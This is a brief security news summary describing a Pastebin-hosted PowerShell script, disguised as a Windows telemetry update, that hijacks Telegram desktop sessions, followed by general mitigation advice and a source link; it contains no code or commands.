Cybercriminals are employing a novel method to hijack Telegram sessions by utilizing a PowerShell script hosted on Pastebin. This script is disguised as a Windows telemetry update, providing a unique opportunity for cybersecurity professionals to observe the construction and testing of such malicious tools.
Unlike traditional malware that often seeks to extract passwords or browser credentials, this particular script is designed specifically to target Telegram's desktop client data. By focusing solely on session data, the attackers can potentially gain unauthorized access to Telegram accounts without needing to compromise other sensitive information.
The script’s presence on Pastebin, a popular text storage site, allows it to be easily distributed and accessed by potential attackers. This method of delivery also helps the script evade detection by traditional security measures, which may not flag it as suspicious due to its appearance as a legitimate Windows update.
The impact of this attack vector is significant for users of Telegram’s desktop client, as it could lead to unauthorized access to private communications and data. This highlights the ongoing need for vigilance and robust security practices among users of messaging platforms.
To mitigate the risk of such attacks, users should be cautious of unexpected updates and verify the authenticity of any scripts before executing them. Employing comprehensive security solutions and staying informed about emerging threats can also help protect against session hijacking attempts.
Source: https://flare.io/learn/resources/blog/telegram-session-stealerpastebin-hosted-powershell-script-targets-desktop-web-sessions